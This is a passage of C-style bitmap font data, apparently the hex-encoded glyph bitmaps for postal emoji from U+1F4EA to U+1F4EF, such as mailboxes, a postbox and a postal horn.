0xe1, 0xe0, 0x0, 0x0, 0x0, 0x3, 0x87, 0xe0,
0xf0, 0x0, 0x0, 0x0, 0xf, 0x7, 0xe0, 0x78,
0x0, 0x0, 0x0, 0x1e, 0x7, 0xe0, 0x3c, 0x0,
0x0, 0x0, 0x3c, 0x7, 0xe0, 0x1e, 0x0, 0x0,
0x0, 0x78, 0x7, 0xe0, 0x7, 0x0, 0x0, 0x0,
0xf0, 0x7, 0xe0, 0x3, 0xc0, 0x0, 0x3, 0xc0,
0x7, 0xe0, 0x1, 0xe0, 0x0, 0x7, 0x80, 0x7,
0xe0, 0x1, 0xf0, 0x0, 0xf, 0x80, 0x7, 0xe0,
0x1, 0xf8, 0x0, 0x1f, 0xc0, 0x7, 0xe0, 0x3,
0x9c, 0x0, 0x3d, 0xc0, 0x7, 0xe0, 0x7, 0xf,
0x0, 0xf0, 0xe0, 0x7, 0xe0, 0x7, 0x7, 0x81,
0xe0, 0x70, 0x7, 0xe0, 0xe, 0x3, 0xc3, 0xc0,
0x70, 0x7, 0xe0, 0x1c, 0x1, 0xe7, 0x80, 0x38,
0x7, 0xe0, 0x1c, 0x0, 0x7e, 0x0, 0x18, 0x7,
0xe0, 0x38, 0x0, 0x3c, 0x0, 0x1c, 0x7, 0xe0,
0x70, 0x0, 0x18, 0x0, 0xe, 0x7, 0xe0, 0x70,
0x0, 0x0, 0x0, 0x6, 0x7, 0xe0, 0xe0, 0x0,
0x0, 0x0, 0x7, 0x7, 0xe1, 0xc0, 0x0, 0x0,
0x0, 0x3, 0x87, 0xe1, 0xc0, 0x0, 0x0, 0x0,
0x3, 0x87, 0xe3, 0x80, 0x0, 0x0, 0x0, 0x1,
0xc7, 0xe7, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe7,
0xe7, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe7, 0xee,
0x0, 0x0, 0x0, 0x0, 0x0, 0x77, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4EA "📪" */
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x1f, 0x0, 0xf8, 0x0, 0x0, 0x0, 0xf,
0x80, 0x7, 0x80, 0x7, 0x80, 0x0, 0x0, 0x0,
0x3c, 0x1, 0xe0, 0x0, 0x78, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x78, 0x0, 0x7, 0x80, 0x0, 0x0,
0x0, 0x38, 0xe, 0x0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x70, 0x70, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x7, 0xe, 0x1f, 0xfc, 0x1c, 0x0,
0x0, 0x0, 0x0, 0xe3, 0x83, 0xff, 0x81, 0xc0,
0x3e, 0x0, 0x0, 0x1c, 0x70, 0x70, 0x70, 0x38,
0xf, 0xe0, 0x0, 0x1, 0xce, 0xe, 0xe, 0x7,
0x3, 0xdf, 0xff, 0xff, 0xff, 0xc1, 0xc1, 0xc0,
0xe0, 0x71, 0xff, 0xff, 0xff, 0xf8, 0x38, 0x38,
0x1c, 0xc, 0x1c, 0x0, 0x0, 0x1f, 0x7, 0xff,
0x3, 0x83, 0x83, 0x80, 0x0, 0x3, 0xe0, 0xff,
0xe0, 0x70, 0x70, 0x70, 0x0, 0x0, 0x7c, 0x0,
0x0, 0xe, 0x6, 0xf, 0xff, 0xfe, 0xf, 0x80,
0x0, 0x1, 0xc0, 0xc1, 0xff, 0xff, 0xc1, 0xf0,
0x0, 0x0, 0x38, 0x1c, 0x7f, 0xff, 0xf8, 0x3e,
0x0, 0x0, 0x7, 0x1, 0xfc, 0x0, 0x7, 0x7,
0xc0, 0x0, 0x0, 0xe0, 0x1f, 0x0, 0x0, 0xe0,
0xf8, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x1c,
0x1f, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0, 0x3,
0x83, 0xe0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x70, 0x7c, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0xe, 0xf, 0x80, 0x0, 0x1, 0xc0, 0x0, 0x0,
0x1, 0xc1, 0xf0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x0, 0x3f, 0xfe, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x7, 0xff, 0xc0, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0xe7, 0x0, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x0, 0x3, 0x9c, 0x0, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x73, 0x80, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x1, 0xce, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x39, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x81, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xf0, 0x0, 0x0, 0x0,
/* U+1F4EB "📫" */
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x31, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0xff, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x30, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x18, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0x8f, 0xff,
0xe0, 0x0, 0xf, 0xff, 0xff, 0xff, 0xc7, 0xff,
0xfe, 0x0, 0x1f, 0x0, 0xf8, 0x0, 0x63, 0x0,
0xf, 0xc0, 0x1e, 0x0, 0x1e, 0x0, 0x31, 0x80,
0x0, 0xf0, 0x1e, 0x0, 0x7, 0x80, 0x18, 0xc0,
0x0, 0x3c, 0xe, 0x0, 0x1, 0xe0, 0xc, 0x60,
0x0, 0xe, 0xe, 0x0, 0x0, 0x70, 0x6, 0x30,
0x0, 0x3, 0x8e, 0x0, 0x0, 0x3c, 0x3, 0x18,
0x0, 0x1, 0xe7, 0x0, 0x0, 0xe, 0x1, 0x8c,
0x0, 0x0, 0x73, 0x87, 0xff, 0x7, 0x0, 0xc6,
0x0, 0x0, 0x3b, 0x83, 0xff, 0x81, 0xc0, 0x7f,
0x0, 0x0, 0x1d, 0xc1, 0xc1, 0xc0, 0xe0, 0x3f,
0x80, 0x0, 0x7, 0xe0, 0xe0, 0xe0, 0x70, 0x38,
0xe0, 0x0, 0x3, 0xf0, 0x70, 0x70, 0x38, 0x18,
0x30, 0x0, 0x1, 0xf8, 0x38, 0x38, 0x1c, 0xc,
0x1c, 0x0, 0x0, 0xfc, 0x1f, 0xfc, 0xe, 0xe,
0xe, 0x0, 0x0, 0x7e, 0xf, 0xfe, 0x7, 0x7,
0x7, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x3, 0x81,
0x83, 0x80, 0x0, 0x1f, 0x80, 0x0, 0x1, 0xc0,
0xc1, 0x80, 0x0, 0xf, 0xc0, 0x0, 0x0, 0xe0,
0x71, 0xc0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x70,
0x1f, 0xc0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x38,
0x3, 0xc0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x70, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x38, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x81, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xc0, 0x0, 0x0,
/* U+1F4EC "📬" */
0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x63, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x31, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x38, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0x1f, 0xff,
0xe0, 0x0, 0xf, 0xff, 0xff, 0xff, 0x8f, 0xff,
0xfe, 0x0, 0xf, 0xff, 0xf8, 0x0, 0xc7, 0x0,
0x7, 0xc0, 0x1f, 0xff, 0xfe, 0x0, 0x63, 0x80,
0x0, 0xf0, 0x1f, 0xff, 0xff, 0x80, 0x31, 0xc0,
0x0, 0x3c, 0xf, 0xff, 0xff, 0xc0, 0x18, 0xe0,
0x0, 0xe, 0xf, 0xff, 0xff, 0xf0, 0xc, 0x70,
0x0, 0x3, 0x87, 0xff, 0xff, 0xf8, 0x6, 0x38,
0x0, 0x1, 0xe7, 0xff, 0xff, 0xfe, 0x3, 0x1c,
0x0, 0x0, 0x73, 0xff, 0xff, 0xff, 0x1, 0x8e,
0x0, 0x0, 0x39, 0xff, 0xff, 0xff, 0x80, 0xff,
0x0, 0x0, 0xe, 0xff, 0xff, 0xff, 0xc0, 0x7f,
0x80, 0x0, 0x7, 0xff, 0xff, 0xff, 0xe0, 0x78,
0xe0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xf0, 0x38,
0x30, 0x0, 0x1, 0xff, 0xff, 0xff, 0xfc, 0x18,
0x1c, 0x0, 0x0, 0xff, 0xff, 0xff, 0xfe, 0x1c,
0xe, 0x0, 0x0, 0x7f, 0x80, 0x0, 0x7, 0xe,
0x7, 0x0, 0x0, 0x3f, 0xe0, 0x0, 0x3, 0x83,
0x3, 0x80, 0x0, 0x1f, 0xf8, 0x0, 0x1, 0xc1,
0xc3, 0x80, 0x0, 0xf, 0xbf, 0x0, 0x0, 0xe0,
0xf1, 0xc0, 0x0, 0x7, 0xc7, 0xc0, 0x0, 0x70,
0x3f, 0xc0, 0x0, 0x3, 0xf1, 0xf0, 0x0, 0x78,
0x7, 0x80, 0x0, 0x1, 0xf8, 0x3e, 0x0, 0x7c,
0x0, 0x0, 0x0, 0x0, 0xfc, 0xf, 0x80, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x7, 0xe0, 0x3f,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x83, 0xfc, 0x3f,
0x80, 0x0, 0x0, 0x0, 0x1f, 0xc1, 0x9f, 0x39,
0xc0, 0x0, 0x0, 0x0, 0xf, 0xe1, 0xc3, 0xf8,
0xe0, 0x0, 0x0, 0x0, 0x7, 0xf0, 0xe0, 0xf8,
0x70, 0x0, 0x0, 0x0, 0x3, 0xfc, 0xe0, 0x18,
0x38, 0x0, 0x0, 0x0, 0x1, 0xfe, 0x70, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0xff, 0x70, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0xf, 0xfe, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x70, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xc0, 0x0, 0x0,
/* U+1F4ED "📭" */
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x1f, 0xff, 0xf8, 0x0, 0x0, 0x0, 0xf,
0x80, 0x7, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0,
0x3c, 0x1, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x3f, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x38, 0xf, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x3, 0x83, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0x70, 0x7f, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x7, 0xf, 0xff, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x0, 0xe3, 0xff, 0xff, 0xff, 0xc0,
0x3e, 0x0, 0x0, 0x1c, 0x7f, 0xff, 0xff, 0xf8,
0x1f, 0xe0, 0x0, 0x1, 0xcf, 0xff, 0xff, 0xff,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x18, 0x1c, 0x0, 0x0, 0x1f, 0xff, 0xff,
0xff, 0x87, 0x3, 0x80, 0x0, 0x3, 0xff, 0xff,
0xff, 0xf0, 0xe0, 0x70, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xfe, 0xc, 0xe, 0x0, 0x0, 0xf, 0xff,
0xff, 0xff, 0xc1, 0xc3, 0xff, 0xff, 0xc1, 0xff,
0xff, 0xff, 0xf8, 0x3c, 0x7f, 0xff, 0xf8, 0x3f,
0xff, 0xff, 0xff, 0x3, 0xfc, 0x0, 0x7, 0x7,
0xff, 0xff, 0xff, 0xe0, 0x1f, 0x0, 0x0, 0xe0,
0xff, 0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x1c,
0x1f, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0, 0x3,
0x83, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x70, 0x7f, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0,
0xe, 0xf, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x1, 0xc1, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x7, 0x3f, 0xff, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x0, 0xe7, 0xff, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x1c, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x0, 0x0, 0x3, 0x9f, 0xff, 0xff, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x73, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x0, 0xe, 0x7f, 0xff, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x1, 0xcf, 0xff, 0xff,
0xff, 0x0, 0x0, 0x0, 0x0, 0x39, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xf0, 0x0, 0x0, 0x0,
/* U+1F4EE "📮" */
0xf, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x60, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x38, 0x0, 0x0, 0x0, 0x0, 0x3, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1b, 0x80, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x7, 0xff, 0xff, 0xff, 0xc0, 0x3c,
0x1, 0xff, 0xff, 0xff, 0xf0, 0xf, 0x0, 0x7f,
0xff, 0xff, 0xfc, 0x3, 0xc0, 0x1f, 0xff, 0xff,
0xff, 0x0, 0xf0, 0x7, 0xfe, 0x3, 0xff, 0xc0,
0x3c, 0x1, 0xf9, 0xc1, 0xe3, 0xf0, 0xf, 0x0,
0xe, 0x39, 0xf0, 0xe0, 0x3, 0xc0, 0x7, 0x7,
0xf0, 0x18, 0x0, 0xf0, 0x1, 0xc0, 0xf8, 0x7,
0x0, 0x3c, 0x0, 0x70, 0x1c, 0x1, 0xc0, 0xf,
0x0, 0x38, 0x3, 0x80, 0x38, 0x3, 0xc0, 0xe,
0x0, 0x70, 0xe, 0x0, 0xf0, 0x7, 0x0, 0xe,
0x1, 0x80, 0x3c, 0x1, 0xc0, 0x7, 0xc0, 0x70,
0xf, 0x0, 0xe0, 0x3, 0xe0, 0xc, 0x3, 0xc0,
0x38, 0x3, 0xe0, 0x3, 0x80, 0xf0, 0xe, 0x3,
0xe0, 0x0, 0xe0, 0x3c, 0x7, 0x3, 0xfe, 0x0,
0x18, 0xf, 0x1, 0xc1, 0xf7, 0xf0, 0x7, 0x3,
0xc0, 0xe1, 0xf0, 0x3f, 0x80, 0xc0, 0xf0, 0x39,
0xf0, 0x1, 0xf8, 0x38, 0x3c, 0x1d, 0xf0, 0x0,
0x1f, 0xce, 0xf, 0x7, 0xf8, 0x0, 0x0, 0xfd,
0xc3, 0xc3, 0xf8, 0x0, 0x0, 0x7, 0xf0, 0xf0,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x3c, 0x3f, 0xff,
0xff, 0xff, 0xff, 0x8f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x38, 0x3, 0x80, 0x0, 0x0, 0x0, 0xe, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x38, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x38, 0x3, 0x80, 0x0, 0x0, 0x0, 0xe,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xff, 0xfe, 0x0, 0x0,
/* U+1F4EF "📯" */
0x0, 0x0, 0x0, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x7c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xe0, 0x0,
0x6, 0x0, 0xc0, 0x0, 0x0, 0x6, 0x38, 0x3f,
0x0, 0x30, 0x1f, 0x0, 0x0, 0x0, 0xe3, 0x1f,
0xfe, 0x3, 0x81, 0xf8, 0x0, 0x0, 0xc, 0x3,
0xc0, 0xf0, 0x18, 0x3f, 0xc0, 0x0, 0x1, 0xc0,
0x70, 0x3, 0x81, 0xc3, 0xfe, 0x0, 0x0, 0x18,
0xe, 0x0, 0x1c, 0xc, 0x3f, 0xf0, 0x1, 0xe1,
0x81, 0xc0, 0x0, 0xe0, 0xc3, 0xff, 0x80, 0x3f,
0x30, 0x18, 0x0, 0x6, 0xe, 0x37, 0xf8, 0x7,
0x33, 0x3, 0x80, 0x0, 0x60, 0x63, 0x7f, 0xc0,
0x63, 0xb0, 0x30, 0x0, 0x3, 0x6, 0x33, 0xfe,
0xc, 0x1b, 0x3, 0x0, 0x0, 0x30, 0x67, 0x3f,
0xe0, 0xc1, 0xf0, 0x30, 0x0, 0x3, 0x6, 0x63,
0xff, 0xe, 0xf, 0x3, 0x0, 0x0, 0x30, 0x6e,
0x1f, 0xf0, 0x7c, 0x70, 0x30, 0x0, 0x3, 0x6,
0xc0, 0xff, 0x83, 0xe3, 0x3, 0x0, 0x0, 0x30,
0x7c, 0xf, 0xf8, 0xf, 0x30, 0x18, 0x0, 0x6,
0x7, 0x80, 0x7f, 0xc0, 0x39, 0x81, 0x80, 0x0,
0x60, 0xf0, 0x7, 0xfc, 0x1, 0xf8, 0xc, 0x0,
0xc, 0xe, 0x0, 0x3f, 0xe0, 0xf, 0x80, 0xec,
0xcd, 0xc1, 0xc0, 0x1, 0xfe, 0x0, 0x7c, 0x7,
0xdf, 0xf8, 0x78, 0x0, 0x1f, 0xe0, 0x1, 0xe0,
0x3f, 0xff, 0x3e, 0x0, 0x0, 0xff, 0x0, 0xe,
0x1, 0xff, 0xff, 0xc0, 0x0, 0x7, 0xf0, 0x0,
0x70, 0x1f, 0xff, 0xe0, 0x0, 0x0, 0x3f, 0x0,
0x3, 0x81, 0xff, 0xe0, 0x0, 0x3f, 0xfd, 0xf0,
0x0, 0x1c, 0x1f, 0xfe, 0x0, 0x1f, 0xff, 0xff,
0x0, 0x0, 0xf1, 0xff, 0xe0, 0x1f, 0xc0, 0x3,
0xf0, 0x0, 0x7, 0x9f, 0xfe, 0xf, 0xe0, 0x0,
0x6, 0x0, 0x0, 0x1f, 0xff, 0xef, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0x80,
